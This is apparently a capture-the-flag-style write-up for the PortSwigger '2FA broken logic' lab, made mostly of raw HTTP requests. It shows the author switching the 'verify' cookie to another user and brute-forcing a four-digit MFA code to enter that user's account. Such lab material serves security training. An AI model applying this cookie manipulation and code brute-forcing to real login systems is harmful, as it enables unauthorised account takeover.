Skip to content

Port Swigger 2FA broken logic

2FA broken logic

Solution

Open the website: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login

https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login
---
GET /login HTTP/2
Host: 0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Cookie: session=dCelRZWOtKel49qE0BdTc6iJRwpx8aaE; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /login HTTP/2
Host: 0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Cookie: session=dCelRZWOtKel49qE0BdTc6iJRwpx8aaE; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter

Read MFA code from email

https://exploit-0a460087042bf83683fdfe5b01cf006e.exploit-server.net/email
---
GET /email HTTP/1.1
Host: exploit-0a460087042bf83683fdfe5b01cf006e.exploit-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

Login as user: wiener

MFA code: 0965
---
POST /login2 HTTP/2
Host: 0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Cookie: session=1shiu98IdEb3KNJfsJ9YBOBgFd6VmH7z; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

mfa-code=0965

Create request to put MFA code - user carlos

add cookie: verify=carlos
___
POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
I have to add missing parametr "mfa-code"
___
POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

mfa-code=0000

Bruteforce login as user: carlos

Bruteforce MFA code
___
POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Length: 13
Connection: keep-alive

mfa-code=1036

Login as user: carlos without password

POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Length: 13
Connection: keep-alive

mfa-code=1036
---
GET /my-account?id=carlos HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=ZxhYHzIjJH3Do71ehOAfNx1dama0fFei; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://burpsuite/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers

Solved